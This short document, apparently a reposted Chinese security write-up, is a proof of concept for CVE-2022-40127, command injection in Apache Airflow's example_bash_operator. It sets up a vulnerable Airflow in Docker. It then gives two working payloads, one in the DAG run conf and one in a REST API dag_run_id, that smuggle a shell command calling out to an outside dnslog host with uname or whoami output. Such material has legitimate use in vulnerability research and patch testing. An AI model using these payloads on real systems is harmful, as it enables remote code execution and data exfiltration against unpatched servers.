poc docker 环境:
mkdir CVE-2022-40127 && cd CVE-2022-40127curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'#or wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yamlmkdir -p ./dags ./logs ./pluginsecho -e "AIRFLOW_UID=$(id -u)" > .envdocker-compose up airflow-initdocker-compose up -d#waiting some timesopen localhost:8080
POC 1
example_bash_operator
{"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}dnslog via
POC 2
curl -X 'POST' \'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \-H 'accept: application/json' \-H 'Content-Type: application/json' \-d '{"conf": {"dag_run": "api2"},"dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw","logical_date": "2022-11-19T10:13:13.920Z"}'
http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run
http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run
dnslog via
commit:
https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a
links:
https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496073&idx=1&sn=0ab7770bf93a9a77ee42e5450ec7bc26&chksm=9badb8c2acda31d464c1056b7ffe09a8e78dc991804866957376cef396bb46c501d4fa79e2bf#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh